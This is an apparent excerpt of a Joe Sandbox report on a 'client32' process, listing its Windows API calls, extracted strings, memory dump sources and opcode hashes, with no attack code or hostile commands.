                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                        • String ID: hhctrl.ocx
                                                                                        • API String ID: 1060647816-2298675154
                                                                                        • Opcode ID: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                                        • Instruction ID: 29a85e5adb823bcef9c03dae075ae2b4ea3bdd8fdf15b4c5e271eae4de8d38be
                                                                                        • Opcode Fuzzy Hash: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                                        • Instruction Fuzzy Hash: DF118E7170423A9BDB05CFA9CD90AAAF7BCEB4C708B00047DE511D3244EBB2E958CB50
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 11005981
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 110059BC
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcessReleasewsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 3704029381-2830328467
                                                                                        • Opcode ID: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                                        • Instruction ID: 1cf781a21872bd9441bcd9bb2c78fcf7fe1041f1c585c9da4a5e29128da7e192
                                                                                        • Opcode Fuzzy Hash: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                                        • Instruction Fuzzy Hash: 8C21E475A00705AFE710CB61C880BEBB7E4BF8A358F10407DE5AA4B240DB72A440CBA1
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                                        • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,B24479DC), ref: 1105D59E
                                                                                        • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,B24479DC), ref: 1105D5A8
                                                                                        Strings
                                                                                        • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterEventLeave
                                                                                        • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                                        • API String ID: 3094578987-11999416
                                                                                        • Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                        • Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
                                                                                        • Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                        • Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID: Client$DeleteTempUdpFile %s$ImpersonateNetworkDrives
                                                                                        • API String ID: 269201875-4101313740
                                                                                        • Opcode ID: 684af3d6395c845e42ce0630dcc757007b5b7cfc07769ff075886b7481dcdc94
                                                                                        • Instruction ID: eaaecb8b70183ecae029b1d74aeae058ca3e84080af2c09da11023f0102635fe
                                                                                        • Opcode Fuzzy Hash: 684af3d6395c845e42ce0630dcc757007b5b7cfc07769ff075886b7481dcdc94
                                                                                        • Instruction Fuzzy Hash: 04217279B442019BE314CBA4CC91F66B3A1BB84718F244A6CE5AD8B3C5CA71F841CB51
                                                                                        APIs
                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B969F
                                                                                        • MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B96D8
                                                                                        • SetTimer.USER32(8D111949,0000050D,000007D0,00000000), ref: 110B9710
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InfoMoveParametersSystemTimerWindow
                                                                                        • String ID: Max
                                                                                        • API String ID: 1521622399-2772132969
                                                                                        • Opcode ID: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                                        • Instruction ID: 87ccea237e2aa79ae125a3322bdb2c24729383307459d143463b3682e3a222a8
                                                                                        • Opcode Fuzzy Hash: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                                        • Instruction Fuzzy Hash: A2213DB5A40309AFD714DFA4C885FAFF7B8EB48710F10452EE96597380CB70A941CBA0
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • SendMessageA.USER32(?,000004FF,00000000,00000000,?,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004,00000000,?), ref: 111258C5
                                                                                        • DestroyWindow.USER32 ref: 111258D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DestroyMessageSendWindow__wcstoi64
                                                                                        • String ID: BlankAll$View
                                                                                        • API String ID: 321412109-3798095874
                                                                                        • Opcode ID: e19a2e47aee10cb42d15e20edb5043a77933b82c8a81f00b6565625d179844f9
                                                                                        • Instruction ID: fa6ce96dcec4713ec44a6fea70dda2fc35063a1a39e070fc1259ad02d852b18a
                                                                                        • Opcode Fuzzy Hash: e19a2e47aee10cb42d15e20edb5043a77933b82c8a81f00b6565625d179844f9
                                                                                        • Instruction Fuzzy Hash: 1E1191B5A007066FE3249B768CC0AABF6EDEF48358B90082DF25747650CB74BC40C761
                                                                                        APIs
                                                                                        • _memmove.LIBCMT ref: 111535AC
                                                                                        • _memmove.LIBCMT ref: 111535E6
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                        • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                        • API String ID: 6605023-1396654219
                                                                                        • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                        • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                                        • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                        • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                                        APIs
                                                                                        • InterlockedIncrement.KERNEL32(111F1BC0), ref: 111398B1
                                                                                        Strings
                                                                                        • Inited VolumeControl Subsystem (OK: 1 Ref)., xrefs: 111398DA
                                                                                        • Initing VolumeControl Subsystem..., xrefs: 11139898
                                                                                        • Inited VolumeControl Subsystem (OK: Ref's already exist)., xrefs: 11139936
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: IncrementInterlocked
                                                                                        • String ID: Inited VolumeControl Subsystem (OK: 1 Ref).$Inited VolumeControl Subsystem (OK: Ref's already exist).$Initing VolumeControl Subsystem...
                                                                                        • API String ID: 3508698243-2739245937
                                                                                        • Opcode ID: f5dded5991a1729abc01e431adb55c9e4ab023a8a7af5cf22b29cff14a83106b
                                                                                        • Instruction ID: 8ac7705195b121ec2a8e66f06046531bb3c3c41fe71c89f648c6a83688c0c473
                                                                                        • Opcode Fuzzy Hash: f5dded5991a1729abc01e431adb55c9e4ab023a8a7af5cf22b29cff14a83106b
                                                                                        • Instruction Fuzzy Hash: 18012B79E0451EA7CB00AFF59D41B9EF768DB82A2DF100A75E419D3A44FB35750087A1
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(00000000,00000001), ref: 110395E6
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 110395EE
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                        • API String ID: 1136984157-1986719024
                                                                                        • Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                        • Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
                                                                                        • Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                        • Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                        • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                        • API String ID: 819365019-2727927828
                                                                                        • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                        • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                                        • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                        • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                                        APIs
                                                                                        • IsWindow.USER32(?), ref: 110ED498
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                        • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                        • API String ID: 2577986331-1331251348
                                                                                        • Opcode ID: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                        • Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
                                                                                        • Opcode Fuzzy Hash: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                        • Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9
                                                                                        APIs
                                                                                          • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F466
                                                                                          • Part of subcall function 1103F450: FindWindowA.USER32 ref: 1103F47C
                                                                                          • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F484
                                                                                          • Part of subcall function 1103F450: Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                          • Part of subcall function 1103F450: FindWindowA.USER32 ref: 1103F4A7
